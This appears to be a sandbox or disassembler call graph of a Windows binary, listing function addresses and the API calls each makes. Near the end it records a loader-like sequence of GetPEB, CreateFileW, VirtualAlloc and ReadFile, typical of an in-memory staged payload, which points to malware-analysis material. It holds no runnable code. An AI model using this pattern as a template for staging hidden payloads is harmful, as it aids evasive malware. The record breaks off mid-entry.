96931 631398 96894->96931 96898 63116a 96899 63a961 22 API calls 96898->96899 96900 631174 96899->96900 96901 63a961 22 API calls 96900->96901 96902 63117e 96901->96902 96903 63a961 22 API calls 96902->96903 96904 631188 96903->96904 96905 63a961 22 API calls 96904->96905 96906 6311c6 96905->96906 96907 63a961 22 API calls 96906->96907 96908 631292 96907->96908 96941 63171c 96908->96941 96912 6312c4 96913 63a961 22 API calls 96912->96913 96914 6312ce 96913->96914 96962 641940 96914->96962 96916 6312f9 96972 631aab 96916->96972 96918 631315 96919 631325 GetStdHandle 96918->96919 96920 672485 96919->96920 96921 63137a 96919->96921 96920->96921 96922 67248e 96920->96922 96924 631387 OleInitialize 96921->96924 96923 64fddb 22 API calls 96922->96923 96925 672495 96923->96925 96924->96891 96979 6a011d InitializeCriticalSectionAndSpinCount InterlockedExchange GetCurrentProcess GetCurrentProcess DuplicateHandle 96925->96979 96927 67249e 96980 6a0944 CreateThread 96927->96980 96929 6724aa CloseHandle 96929->96921 96930->96893 96981 6313f1 96931->96981 96934 6313f1 22 API calls 96935 6313d0 96934->96935 96936 63a961 22 API calls 96935->96936 96937 6313dc 96936->96937 96938 636b57 22 API calls 96937->96938 96939 631129 96938->96939 96940 631bc3 6 API calls 96939->96940 96940->96898 96942 63a961 22 API calls 96941->96942 96943 63172c 96942->96943 96944 63a961 22 API calls 96943->96944 96945 631734 96944->96945 96946 63a961 22 API calls 96945->96946 96947 63174f 96946->96947 96948 64fddb 22 API calls 96947->96948 96949 63129c 96948->96949 96950 631b4a 96949->96950 96951 631b58 96950->96951 96952 63a961 22 API calls 96951->96952 96953 631b63 96952->96953 96954 63a961 22 API calls 96953->96954 96955 631b6e 96954->96955 96956 63a961 22 API calls 96955->96956 96957 631b79 96956->96957 96958 63a961 22 API calls 96957->96958 96959 631b84 96958->96959 96960 64fddb 22 API calls 96959->96960 96961 631b96 RegisterWindowMessageW 96960->96961 96961->96912 96963 641981 96962->96963 96964 64195d 96962->96964 96988 650242 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 96963->96988 96971 64196e 96964->96971 96990 650242 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 96964->96990 96966 64198b 96966->96964 96989 6501f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 96966->96989 96969 648727 96969->96971 96991 6501f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 96969->96991 96971->96916 96973 631abb 96972->96973 96974 67272d 96972->96974 96975 64fddb 22 API calls 96973->96975 96992 6a3209 23 API calls 96974->96992 96978 631ac3 96975->96978 96977 672738 96978->96918 96979->96927 96980->96929 96993 6a092a 28 API calls 96980->96993 96982 63a961 22 API calls 96981->96982 96983 6313fc 96982->96983 96984 63a961 22 API calls 96983->96984 96985 631404 96984->96985 96986 63a961 22 API calls 96985->96986 96987 6313c6 96986->96987 96987->96934 96988->96966 96989->96964 96990->96969 96991->96971 96992->96977 96994 682a00 97008 63d7b0 96994->97008 96995 63db11 PeekMessageW 96995->97008 96996 63d807 GetInputState 96996->96995 96996->97008 96997 681cbe TranslateAcceleratorW 96997->97008 96999 63db73 TranslateMessage DispatchMessageW 97000 63db8f PeekMessageW 96999->97000 97000->97008 97001 63da04 timeGetTime 97001->97008 97002 63dbaf Sleep 97019 63dbc0 97002->97019 97003 682b74 Sleep 97003->97019 97004 681dda timeGetTime 97113 64e300 23 API calls 97004->97113 97005 64e551 timeGetTime 97005->97019 97008->96995 97008->96996 97008->96997 97008->96999 97008->97000 97008->97001 97008->97002 97008->97003 97008->97004 97015 63d9d5 97008->97015 97022 63ec40 207 API calls 97008->97022 97026 63dd50 97008->97026 97033 63dfd0 97008->97033 97056 641310 97008->97056 97111 63bf40 207 API calls 97008->97111 97112 64edf6 IsDialogMessageW GetClassLongW 97008->97112 97114 6a3a2a 23 API calls 97008->97114 97115 6a359c 82 API calls 97008->97115 97009 682c0b GetExitCodeProcess 97012 682c21 WaitForSingleObject 97009->97012 97013 682c37 CloseHandle 97009->97013 97010 6c29bf GetForegroundWindow 97010->97019 97012->97008 97012->97013 97013->97019 97014 682a31 97014->97015 97016 682ca9 Sleep 97016->97008 97019->97005 97019->97008 97019->97009 97019->97010 97019->97014 97019->97015 97019->97016 97116 6b5658 23 API calls 97019->97116 97117 69e97b QueryPerformanceCounter QueryPerformanceFrequency Sleep QueryPerformanceCounter Sleep 97019->97117 97118 69d4dc 47 API calls 97019->97118 97022->97008 97027 63dd6f 97026->97027 97029 63dd83 97026->97029 97119 63d260 207 API calls 97027->97119 97120 6a359c 82 API calls 97029->97120 97030 63dd7a 97030->97008 97032 682f75 97032->97032 97034 63e010 97033->97034 97050 63e0dc 97034->97050 97123 650242 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 97034->97123 97035 63ec40 207 API calls 97035->97050 97038 682fca 97040 63a961 22 API calls 97038->97040 97038->97050 97039 63a961 22 API calls 97039->97050 97041 682fe4 97040->97041 97124 6500a3 29 API calls 97041->97124 97045 682fee 97125 6501f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 97045->97125 97049 63a8c7 22 API calls 97049->97050 97050->97035 97050->97039 97050->97049 97051 63e3e1 97050->97051 97052 6404f0 22 API calls 97050->97052 97053 6a359c 82 API calls 97050->97053 97121 63a81b 41 API calls 97050->97121 97122 64a308 207 API calls 97050->97122 97126 650242 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 97050->97126 97127 6500a3 29 API calls 97050->97127 97128 6501f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 97050->97128 97129 6b47d4 207 API calls 97050->97129 97130 6b68c1 207 API calls 97050->97130 97051->97008 97052->97050 97053->97050 97057 641376 97056->97057 97058 6417b0 97056->97058 97059 641390 97057->97059 97060 686331 97057->97060 97283 650242 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 97058->97283 97062 641940 9 API calls 97059->97062 97242 6b709c 97060->97242 97065 6413a0 97062->97065 97064 6417ba 97067 6417fb 97064->97067 97069 639cb3 22 API calls 97064->97069 97068 641940 9 API calls 97065->97068 97066 68633d 97066->97008 97071 686346 97067->97071 97073 64182c 97067->97073 97070 6413b6 97068->97070 97076 6417d4 97069->97076 97070->97067 97072 6413ec 97070->97072 97288 6a359c 82 API calls 97071->97288 97072->97071 97096 641408 97072->97096 97285 63aceb 23 API calls 97073->97285 97284 6501f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 97076->97284 97077 641839 97286 64d217 207 API calls 97077->97286 97080 68636e 97289 6a359c 82 API calls 97080->97289 97081 64152f 97083 64153c 97081->97083 97084 6863d1 97081->97084 97086 641940 9 API calls 97083->97086 97291 6b5745 54 API calls 97084->97291 97087 641549 97086->97087 97092 641940 9 API calls 97087->97092 97102 6415c7 97087->97102 97088 64fddb 22 API calls 97088->97096 97089 641872 97287 64faeb 23 API calls 97089->97287 97090 64fe0b 22 API calls 97090->97096 97098 641563 97092->97098 97093 64171d 97093->97008 97095 63ec40 207 API calls 97095->97096 97096->97077 97096->97080 97096->97081 97096->97088 97096->97090 97096->97095 97100 6863b2 97096->97100 97096->97102 97098->97102 97104 63a8c7 22 API calls 97098->97104 97099 641940 9 API calls 97099->97102 97290 6a359c 82 API calls 97100->97290 97101 64167b 97101->97093 97282 64ce17 22 API calls 97101->97282 97102->97089 97102->97099 97102->97101 97131 6b958b 97102->97131 97134 6be204 97102->97134 97170 6a744a 97102->97170 97226 6a83da 97102->97226 97229 6af0ec 97102->97229 97238 636246 97102->97238 97292 6a359c 82 API calls 97102->97292 97104->97102 97111->97008 97112->97008 97113->97008 97114->97008 97115->97008 97116->97019 97117->97019 97118->97019 97119->97030 97120->97032 97121->97050 97122->97050 97123->97038 97124->97045 97125->97050 97126->97050 97127->97050 97128->97050 97129->97050 97130->97050 97293 6b7f59 97131->97293 97133 6b959b 97133->97102 97135 63a961 22 API calls 97134->97135 97136 6be21b 97135->97136 97137 637510 53 API calls 97136->97137 97138 6be22a 97137->97138 97139 636270 22 API calls 97138->97139 97140 6be23d 97139->97140 97141 637510 53 API calls 97140->97141 97142 6be24a 97141->97142 97143 6be262 97142->97143 97144 6be2c7 97142->97144 97432 63b567 39 API calls 97143->97432 97145 637510 53 API calls 97144->97145 97147 6be2cc 97145->97147 97149 6be2d9 97147->97149 97150 6be314 97147->97150 97148 6be267 97148->97149 97151 6be280 97148->97151 97435 639c6e 22 API calls 97149->97435 97152 6be32c 97150->97152 97436 63b567 39 API calls 97150->97436 97433 636d25 22 API calls 97151->97433 97156 6be345 97152->97156 97437 63b567 39 API calls 97152->97437 97159 63a8c7 22 API calls 97156->97159 97157 6be28d 97160 636350 22 API calls 97157->97160 97161 6be35f 97159->97161 97163 6be29b 97160->97163 97413 6992c8 97161->97413 97434 636d25 22 API calls 97163->97434 97165 6be2b4 97166 636350 22 API calls 97165->97166 97169 6be2c2 97166->97169 97167 6be2e6 97167->97102 97438 6362b5 22 API calls 97169->97438 97171 6a7474 97170->97171 97172 6a7469 97170->97172 97176 63a961 22 API calls 97171->97176 97213 6a7554 97171->97213 97450 63b567 39 API calls 97172->97450 97174 64fddb 22 API calls 97175 6a7587 97174->97175 97177 64fe0b 22 API calls 97175->97177 97178 6a7495 97176->97178 97179 6a7598 97177->97179 97180 63a961 22 API calls 97178->97180 97181 636246 CloseHandle 97179->97181 97182 6a749e 97180->97182 97184 6a75a3 97181->97184 97183 637510 53 API calls 97182->97183 97185 6a74aa 97183->97185 97186 63a961 22 API calls 97184->97186 97451 63525f 22 API calls 97185->97451 97188 6a75ab 97186->97188 97190 636246 CloseHandle 97188->97190 97189 6a74bf 97191 636350 22 API calls 97189->97191 97192 6a75b2 97190->97192 97195 6a74f2 97191->97195 97193 637510 53 API calls 97192->97193 97196 6a75be 97193->97196 97194 6a754a 97454 63b567 39 API calls 97194->97454 97195->97194 97452 69d4ce lstrlenW GetFileAttributesW FindFirstFileW FindClose 97195->97452 97198 636246 CloseHandle 97196->97198 97201 6a75c8 97198->97201 97200 6a7502 97200->97194 97202 6a7506 97200->97202 97442 635745 97201->97442 97204 639cb3 22 API calls 97202->97204 97206 6a7513 97204->97206 97453 69d2c1 26 API calls 97206->97453 97207 6a75ea 97455 6353de 27 API calls 97207->97455 97208 6a76de GetLastError 97210 6a76f7 97208->97210 97462 636216 CloseHandle 97210->97462 97213->97174 97224 6a76a4 97213->97224 97214 6a751c 97214->97194 97215 6a75f8 97456 6353c7 SetFilePointerEx SetFilePointerEx SetFilePointerEx 97215->97456 97217 6a7645 97218 64fddb 22 API calls 97217->97218 97220 6a7679 97218->97220 97219 6a75ff 97219->97217 97457 69ccff 97219->97457 97222 63a961 22 API calls 97220->97222 97223 6a7686 97222->97223 97223->97224 97461 69417d 22 API calls 97223->97461 97224->97102 97465 6a98e3 97226->97465 97228 6a83ea 97228->97102 97230 637510 53 API calls 97229->97230 97231 6af126 97230->97231 97528 639e90 97231->97528 97233 6af136 97234 6af15b 97233->97234 97235 63ec40 207 API calls 97233->97235 97237 6af15f 97234->97237 97556 639c6e 22 API calls 97234->97556 97235->97234 97237->97102 97239 636250 97238->97239 97240 63625f 97238->97240 97239->97102 97240->97239 97241 636264 CloseHandle 97240->97241 97241->97239 97243 6b70db 97242->97243 97244 6b70f5 97242->97244 97575 6a359c 82 API calls 97243->97575 97564 6b5689 97244->97564 97248 63ec40 206 API calls 97249 6b7164 97248->97249 97250 6b71ff 97249->97250 97254 6b71a6 97249->97254 97256 6b70ed 97249->97256 97251 6b7253 97250->97251 97252 6b7205 97250->97252 97253 637510 53 API calls 97251->97253 97251->97256 97576 6a1119 22 API calls 97252->97576 97255 6b7265 97253->97255 97260 6a0acc 22 API calls 97254->97260 97258 63aec9 22 API calls 97255->97258 97256->97066 97262 6b7289 CharUpperBuffW 97258->97262 97259 6b7228 97577 63a673 22 API calls 97259->97577 97261 6b71de 97260->97261 97264 641310 206 API calls 97261->97264 97266 6b72a3 97262->97266 97264->97256 97265 6b7230 97578 63bf40 207 API calls 97265->97578 97267 6b72aa 97266->97267 97268 6b72f6 97266->97268 97571 6a0acc 97267->97571 97269 637510 53 API calls 97268->97269 97271 6b72fe 97269->97271 97579 64e300 23 API calls 97271->97579 97275 641310 206 API calls 97275->97256 97276 6b7308 97276->97256 97277 637510 53 API calls 97276->97277 97278 6b7323 97277->97278 97580 63a673 22 API calls 97278->97580 97280 6b7333 97581 63bf40 207 API calls 97280->97581 97282->97101 97283->97064 97284->97067 97285->97077 97286->97089 97287->97089 97288->97102 97289->97102 97290->97102 97291->97098 97292->97102 97331 637510 97293->97331 97297 6b8281 97298 6b844f 97297->97298 97303 6b828f 97297->97303 97395 6b8ee4 60 API calls 97298->97395 97301 6b845e 97302 6b846a 97301->97302 97301->97303 97318 6b7fd5 97302->97318 97367 6b7e86 97303->97367 97304 637510 53 API calls 97320 6b8049 97304->97320 97309 6b82c8 97382 64fc70 97309->97382 97312 6b82e8 97388 6a359c 82 API calls 97312->97388 97313 6b8302 97389 6363eb 22 API calls 97313->97389 97316 6b82f3 GetCurrentProcess TerminateProcess 97316->97313 97317 6b8311 97390 636a50 22 API calls 97317->97390 97318->97133 97320->97297 97320->97304 97320->97318 97386 69417d 22 API calls 97320->97386 97387 6b851d 42 API calls 97320->97387 97321 6b832a 97329 6b8352 97321->97329 97391 6404f0 22 API calls 97321->97391 97323 6b84c5 97323->97318 97327 6b84d9 FreeLibrary 97323->97327 97324 6b8341 97392 6b8b7b 75 API calls 97324->97392 97327->97318 97329->97323 97393 6404f0 22 API calls 97329->97393 97394 63aceb 23 API calls 97329->97394 97396 6b8b7b 75 API calls 97329->97396 97332 637525 97331->97332 97348 637522 97331->97348 97333 63755b 97332->97333 97334 63752d 97332->97334 97337 63756d 97333->97337 97343 6750f6 97333->97343 97345 67500f 97333->97345 97397 6551c6 26 API calls 97334->97397 97398 64fb21 51 API calls 97337->97398 97338 67510e 97338->97338 97341 64fddb 22 API calls 97344 637547 97341->97344 97342 63753d 97342->97341 97400 655183 26 API calls 97343->97400 97346 639cb3 22 API calls 97344->97346 97347 64fe0b 22 API calls 97345->97347 97353 675088 97345->97353 97346->97348 97349 675058 97347->97349 97348->97318 97354 6b8cd3 97348->97354 97350 64fddb 22 API calls 97349->97350 97351 67507f 97350->97351 97352 639cb3 22 API calls 97351->97352 97352->97353 97399 64fb21 51 API calls 97353->97399 97355 63aec9 22 API calls 97354->97355 97356 6b8cee CharLowerBuffW 97355->97356 97401 698e54 97356->97401 97360 63a961 22 API calls 97361 6b8d2a 97360->97361 97408 636d25 22 API calls 97361->97408 97363 6b8d3e 97364 6393b2 22 API calls 97363->97364 97366 6b8d48 97364->97366 97365 6b8e5e 97365->97320 97366->97365 97409 6b851d 42 API calls 97366->97409 97368 6b7eec 97367->97368 97369 6b7ea1 97367->97369 97373 6b9096 97368->97373 97370 64fe0b 22 API calls 97369->97370 97371 6b7ec3 97370->97371 97371->97368 97372 64fddb 22 API calls 97371->97372 97372->97371 97374 6b92ab 97373->97374 97381 6b90ba 97373->97381 97374->97309 97375 63b567 39 API calls 97375->97381 97376 63b38f 39 API calls 97376->97381 97377 63b6b5 39 API calls 97377->97381 97378 637510 53 API calls 97378->97381 97379 65ea0c 21 API calls 97379->97381 97381->97374 97381->97375 97381->97376 97381->97377 97381->97378 97381->97379 97412 69efae 24 API calls 97381->97412 97383 64fc85 97382->97383 97384 64fd1d VirtualProtect 97383->97384 97385 64fceb 97383->97385 97384->97385 97385->97312 97385->97313 97386->97320 97387->97320 97388->97316 97389->97317 97390->97321 97391->97324 97392->97329 97393->97329 97394->97329 97395->97301 97396->97329 97397->97342 97398->97342 97399->97343 97400->97338 97403 698e74 97401->97403 97402 698f63 97402->97360 97402->97366 97403->97402 97405 698ea9 97403->97405 97407 698f68 97403->97407 97405->97402 97410 64ce60 41 API calls 97405->97410 97407->97402 97411 64ce60 41 API calls 97407->97411 97408->97363 97409->97365 97410->97405 97411->97407 97412->97381 97414 63a961 22 API calls 97413->97414 97415 6992de 97414->97415 97416 636270 22 API calls 97415->97416 97417 6992f2 97416->97417 97418 698e54 41 API calls 97417->97418 97424 699314 97417->97424 97420 69930e 97418->97420 97419 698e54 41 API calls 97419->97424 97420->97424 97439 636d25 22 API calls 97420->97439 97423 636350 22 API calls 97423->97424 97424->97419 97424->97423 97425 6993b3 97424->97425 97428 699397 97424->97428 97440 636d25 22 API calls 97424->97440 97426 63a8c7 22 API calls 97425->97426 97427 6993c2 97425->97427 97426->97427 97427->97169 97441 636d25 22 API calls 97428->97441 97430 6993a7 97431 636350 22 API calls 97430->97431 97431->97425 97432->97148 97433->97157 97434->97165 97435->97167 97436->97152 97437->97156 97438->97167 97439->97424 97440->97424 97441->97430 97443 674035 97442->97443 97444 63575c CreateFileW 97442->97444 97445 63577b 97443->97445 97446 67403b CreateFileW 97443->97446 97444->97445 97445->97207 97445->97208 97446->97445 97447 674063 97446->97447 97463 6354c6 SetFilePointerEx SetFilePointerEx SetFilePointerEx 97447->97463 97449 67406e 97449->97445 97450->97171 97451->97189 97452->97200 97453->97214 97454->97213 97455->97215 97456->97219 97458 69cd19 WriteFile 97457->97458 97459 69cd0e 97457->97459 97458->97217 97464 69cc37 SetFilePointerEx SetFilePointerEx SetFilePointerEx 97459->97464 97461->97224 97462->97224 97463->97449 97464->97458 97466 6a99e8 97465->97466 97467 6a9902 97465->97467 97523 6a9caa 39 API calls 97466->97523 97468 64fddb 22 API calls 97467->97468 97470 6a9909 97468->97470 97471 64fe0b 22 API calls 97470->97471 97472 6a991a 97471->97472 97474 636246 CloseHandle 97472->97474 97473 6a9ac5 97516 6a1e96 97473->97516 97475 6a9925 97474->97475 97480 63a961 22 API calls 97475->97480 97476 6a99ca 97476->97228 97478 6a9acc 97485 69ccff 4 API calls 97478->97485 97479 6a99a2 97479->97473 97479->97476 97481 6a9a33 97479->97481 97482 6a992d 97480->97482 97483 637510 53 API calls 97481->97483 97484 636246 CloseHandle 97482->97484 97495 6a9a3a 97483->97495 97486 6a9934 97484->97486 97487 6a9aa8 97485->97487 97489 637510 53 API calls 97486->97489 97487->97476 97498 636246 CloseHandle 97487->97498 97488 6a9abb 97525 69cd57 30 API calls 97488->97525 97492 6a9940 97489->97492 97490 6a9a6e 97493 636270 22 API calls 97490->97493 97494 636246 CloseHandle 97492->97494 97496 6a9a7e 97493->97496 97497 6a994a 97494->97497 97495->97488 97495->97490 97499 6a9a8e 97496->97499 97502 63a8c7 22 API calls 97496->97502 97500 635745 5 API calls 97497->97500 97501 6a9b1e 97498->97501 97504 6333c6 22 API calls 97499->97504 97503 6a9959 97500->97503 97526 636216 CloseHandle 97501->97526 97502->97499 97506 6a995d 97503->97506 97507 6a99c2 97503->97507 97508 6a9a9c 97504->97508 97520 6353de 27 API calls 97506->97520 97522 636216 CloseHandle 97507->97522 97524 69cd57 30 API calls 97508->97524 97512 6a996b 97521 6353c7 SetFilePointerEx SetFilePointerEx SetFilePointerEx 97512->97521 97514 6a9972 97514->97479 97515 69ccff 4 API calls 97514->97515 97515->97479 97517 6a1e9f 97516->97517 97518 6a1ea4 97516->97518 97527 6a0f67 24 API calls 97517->97527 97518->97478 97520->97512 97521->97514 97522->97476 97523->97479 97524->97487 97525->97487 97526->97476 97527->97518 97529 636270 22 API calls 97528->97529 97535 639eb5 97529->97535 97530 639fd2 97531 63a4a1 22 API calls 97530->97531 97532 639fec 97531->97532 97532->97233 97535->97530 97536 63a12c 97535->97536 97537 67f7c4 97535->97537 97539 63a405 97535->97539 97540 67f699 97535->97540 97543 63a6c3 22 API calls 97535->97543 97551 63a587 22 API calls 97535->97551 97552 63aec9 22 API calls 97535->97552 97555 63a4a1 22 API calls 97535->97555 97557 634573 41 API calls 97535->97557 97559 6348c8 23 API calls 97535->97559 97560 6349bd 22 API calls 97535->97560 97561 63a673 22 API calls 97535->97561 97536->97537 97536->97539 97562 6996e2 84 API calls 97537->97562 97539->97532 97563 6996e2 84 API calls 97539->97563 97545 64fddb 22 API calls 97540->97545 97543->97535 97544 67f7d2 97546 63a4a1 22 API calls 97544->97546 97547 67f754 97545->97547 97548 67f7e8 97546->97548 97549 64fe0b 22 API calls 97547->97549 97548->97532 97549->97536 97551->97535 97553 63a0db CharUpperBuffW 97552->97553 97558 63a673 22 API calls 97553->97558 97555->97535 97556->97237 97557->97535 97558->97535 97559->97535 97560->97535 97561->97535 97562->97544 97563->97532 97565 6b56a4 97564->97565 97570 6b56f2 97564->97570 97566 64fe0b 22 API calls 97565->97566 97567 6b56c6 97566->97567 97568 64fddb 22 API calls 97567->97568 97567->97570 97582 6a0a59 22 API calls 97567->97582 97568->97567 97570->97248 97572 6a0ada 97571->97572 97574 6a0b13 97571->97574 97573 64fddb 22 API calls 97572->97573 97572->97574 97573->97574 97574->97275 97575->97256 97576->97259 97577->97265 97578->97256 97579->97276 97580->97280 97581->97256 97582->97567 97583 683a41 97587 6a10c0 97583->97587 97585 683a4c 97586 6a10c0 53 API calls 97585->97586 97586->97585 97588 6a10fa 97587->97588 97592 6a10cd 97587->97592 97588->97585 97589 6a10fc 97599 64fa11 53 API calls 97589->97599 97590 6a1101 97593 637510 53 API calls 97590->97593 97592->97588 97592->97589 97592->97590 97596 6a10f4 97592->97596 97594 6a1108 97593->97594 97595 636350 22 API calls 97594->97595 97595->97588 97598 63b270 39 API calls 97596->97598 97598->97588 97599->97590 97600 106c48b 97603 106c100 97600->97603 97602 106c4d7 97604 1069b30 GetPEB 97603->97604 97607 106c19f 97604->97607 97606 106c1d0 CreateFileW 97606->97607 97613 106c1dd 97606->97613 97608 106c1f9 VirtualAlloc 97607->97608 97607->97613 97614 106c300 CloseHandle 97607->97614 97615 106c310 VirtualFree 97607->97615 97616 106d010 GetPEB 97607->97616 97609 106c21a ReadFile 97608->97609 97608->97613 97612 106c238 VirtualAlloc 97609->97612 97609->97613 97610 106c3ec VirtualFree 97611 106c3fa 97610->97611 97611->97602 97612->97607 97612->97613 97613->97610 97613->97611 97614->97607 97615->97607 97617 106d03a 97616->97617 97617->97606 97618 631cad SystemParametersInfoW 97619 631033 97624 634c91 97619->97624 97623 631042 97625 63a961 22 API calls 97624->97625 97626 634cff 97625->97626 97633 633af0 97626->97633 97628 673cb6 97630 634d9c 97630->97628 97631 631038 97630->97631 97636 6351f7 22 API calls 97630->97636 97632 6500a3 29 API calls 97631->97632 97632->97623 97637 633b1c 97633->97637 97636->97630 97638 633b0f 97637->97638 97639 633b29 97637->97639 97638->97630 97639->97638 97640 633b30 RegOpenKeyExW 97639->97640 97640->97638 97641 633b4a RegQueryValueExW 97640->97641 97642 633b80 RegCloseKey 97641->97642 97643 633b6b 97641->97643 97642->97638 97643->97642 97644 632e37 97645 63a961 22 API calls 97644->97645 97646 632e4d 97645->97646 97723 634ae3 97646->97723 97648 632e6b 97649 633a5a 24 API calls 97648->97649 97650 632e7f 97649->97650 97651 639cb3 22 API calls 97650->97651 97652 632e8c 97651->97652 97653 634ecb 94 API calls 97652->97653 97654 632ea5 97653->97654 97655 672cb0 97654->97655 97656 632ead 97654->97656 97657 6a2cf9 80 API calls 97655->97657 97659 63a8c7 22 API calls 97656->97659 97658 672cc3 97657->97658 97660 672ccf 97658->97660 97662 634f39 68 API calls 97658->97662 97661 632ec3 97659->97661 97664 634f39 68 API calls 97660->97664 97737 636f88 22 API calls 97661->97737 97662->97660 97666 672ce5 97664->97666 97665 632ecf 97667 639cb3 22 API calls 97665->97667 97753 633084 22 API calls 97666->97753 97668 632edc 97667->97668 97738 63a81b 41 API calls 97668->97738 97671 632eec 97673 639cb3 22 API calls 97671->97673 97672 672d02 97754 633084 22 API calls 97672->97754 97675 632f12 97673->97675 97739 63a81b 41 API calls 97675->97739 97676 672d1e 97678 633a5a 24 API calls 97676->97678 97680 672d44 97678->97680 97679 632f21 97683 63a961 22 API calls 97679->97683 97755 633084 22 API calls 97680->97755 97682 672d50 97684 63a8c7 22 API calls 97682->97684 97685 632f3f 97683->97685 97686 672d5e 97684->97686 97740 633084 22 API calls 97685->97740 97756 633084 22 API calls 97686->97756 97689 632f4b 97741 654a28 40 API calls 97689->97741 97690 672d6d 97694 63a8c7 22 API calls 97690->97694 97692 632f59 97692->97666 97693 632f63 97692->97693 97742 654a28 40 API calls 97693->97742 97696 672d83 97694->97696 97757 633084 22 API calls 97696->97757 97697 632f6e 97697->97672 97699 632f78 97697->97699 97743 654a28 40 API calls 97699->97743 97700 672d90 97702 632f83 97702->97676 97703 632f8d 97702->97703 97744 654a28 40 API calls 97703->97744 97705 632f98 97706 632fdc 97705->97706 97745 633084 22 API calls 97705->97745 97706->97690 97707 632fe8 97706->97707 97707->97700 97747 6363eb 22 API calls 97707->97747 97709 632fbf 97712 63a8c7 22 API calls 97709->97712 97711 632ff8 97748 636a50 22 API calls 97711->97748 97714 632fcd 97712->97714 97746 633084 22 API calls 97714->97746 97715 633006 97749 6370b0 23 API calls 97715->97749 97718 633021 97721 633065 97718->97721 97750 636f88 22 API calls 97718->97750 97751 6370b0 23 API calls 97718->97751 97752 633084 22 API calls 97718->97752 97724 634af0 97723->97724 97725 636b57 22 API calls 97724->97725 97726 634b22 97724->97726 97725->97726 97736 634b58 97726->97736 97758 634c6d 97726->97758 97728 639cb3 22 API calls 97730 634c52 97728->97730 97729 639cb3 22 API calls 97729->97736 97731 63515f 22 API calls 97730->97731 97734 634c5e 97731->97734 97732 634c6d 22 API calls 97732->97736 97733 63515f 22 API calls 97733->97736 97734->97648 97735 634c29 97735->97728 97735->97734 97736->97729 97736->97732 97736->97733 97736->97735 97737->97665 97738->97671 97739->97679 97740->97689 97741->97692 97742->97697 97743->97702 97744->97705 97745->97709 97746->97706 97747->97711 97748->97715 97749->97718 97750->97718 97751->97718 97752->97718 97753->97672 97754->97676 97755->97682 97756->97690 97757->97700 97759 63aec9 22 API calls 97758->97759 97760 634c78 97759->97760 97760->97726 97761 633156 97764 633170 97761->97764 97765 633187 97764->97765 97766 6331eb 97765->97766 97767 63318c 97765->97767 97804 6331e9 97765->97804 97771 6331f1 97766->97771 97772 672dfb 97766->97772 97768 633265 PostQuitMessage 97767->97768 97769 633199 97767->97769 97806 63316a 97768->97806 97774 6331a4 97769->97774 97775 672e7c 97769->97775 97770 6331d0 DefWindowProcW 97770->97806 97776 6331f8 97771->97776 97777 63321d SetTimer RegisterWindowMessageW 97771->97777 97813 6318e2 10 API calls 97772->97813 97779 6331ae 97774->97779 97780 672e68 97774->97780 97818 69bf30 34 API calls 97775->97818 97783 633201 KillTimer 97776->97783 97784 672d9c 97776->97784 97781 633246 CreatePopupMenu 97777->97781 97777->97806 97778 672e1c 97814 64e499 42 API calls 97778->97814 97787 6331b9 97779->97787 97797 672e4d 97779->97797 97817 69c161 27 API calls 97780->97817 97781->97806 97809 6330f2 Shell_NotifyIconW 97783->97809 97788 672dd7 MoveWindow 97784->97788 97789 672da1 97784->97789 97792 6331c4 97787->97792 97793 633253 97787->97793 97788->97806 97795 672da7 97789->97795 97796 672dc6 SetFocus 97789->97796 97791 633263 97791->97806 97792->97770 97815 6330f2 Shell_NotifyIconW 97792->97815 97811 63326f 44 API calls 97793->97811 97794 672e8e 97794->97770 97794->97806 97795->97792 97800 672db0 97795->97800 97796->97806 97797->97770 97816 690ad7 22 API calls 97797->97816 97798 633214 97810 633c50 DeleteObject DestroyWindow 97798->97810 97812 6318e2 10 API calls 97800->97812 97804->97770 97807 672e41 97808 633837 49 API calls 97807->97808 97808->97804 97809->97798 97810->97806 97811->97791 97812->97806 97813->97778 97814->97792 97815->97807 97816->97804 97817->97791 97818->97794 97819 63105b 97824 63344d 97819->97824 97821 63106a 97855 6500a3 29 API calls 97821->97855 97823 631074 97825 63345d 97824->97825 97826 63a961 22 API calls 97825->97826 97827 633513 97826->97827 97828 633a5a 24 API calls 97827->97828 97829 63351c 97828->97829 97856 633357 97829->97856 97832 6333c6 22 API calls 97833 633535 97832->97833 97834 63515f 22 API calls 97833->97834 97835 633544 97834->97835 97836 63a961 22 API calls 97835->97836 97837 63354d 97836->97837 97838 63a6c3 22 API calls 97837->97838 97839 633556 RegOpenKeyExW 97838->97839 97840 673176 RegQueryValueExW 97839->97840 97844 633578 97839->97844 97841 673193 97840->97841 97842 67320c RegCloseKey 97840->97842 97843 64fe0b 22 API calls 97841->97843 97842->97844 97853 67321e 97842->97853 97845 6731ac 97843->97845 97844->97821 97846 635722 22 API calls 97845->97846 97847 6731b7 RegQueryValueExW 97846->97847 97848 6731d4 97847->97848 97850 6731ee 97847->97850 97849 636b57 22 API calls 97848->97849 97849->97850 97850->97842 97851 639cb3 22 API calls 97851->97853 97852 63515f 22 API calls 97852->97853 97853->97844 97853->97851 97853->97852 97854 634c6d 22 API calls 97853->97854 97854->97853 97855->97823 97857 671f50 97856->97857 97858 633364 GetFullPathNameW 97857->97858 97859 633386 97858->97859 97860 636b57 22 API calls 97859->97860 97861 6333a4 97860->97861 97861->97832 97862 631098 97867 6342de 97862->97867 97866 6310a7 97868 63a961 22 API calls 97867->97868 97869 6342f5 GetVersionExW 97868->97869 97870 636b57 22 API calls 97869->97870 97871 634342 97870->97871 97872 6393b2 22 API calls 97871->97872 97877 634378 97871->97877 97873 63436c 97872->97873 97875 6337a0 22 API calls 97873->97875 97874 63441b GetCurrentProcess IsWow64Process 97876 634437 97874->97876 97875->97877 97878 673824 GetSystemInfo 97876->97878 97879 63444f LoadLibraryA 97876->97879 97877->97874 97883 6737df 97877->97883 97880 634460 GetProcAddress 97879->97880 97881 63449c GetSystemInfo 97879->97881 97880->97881 97884 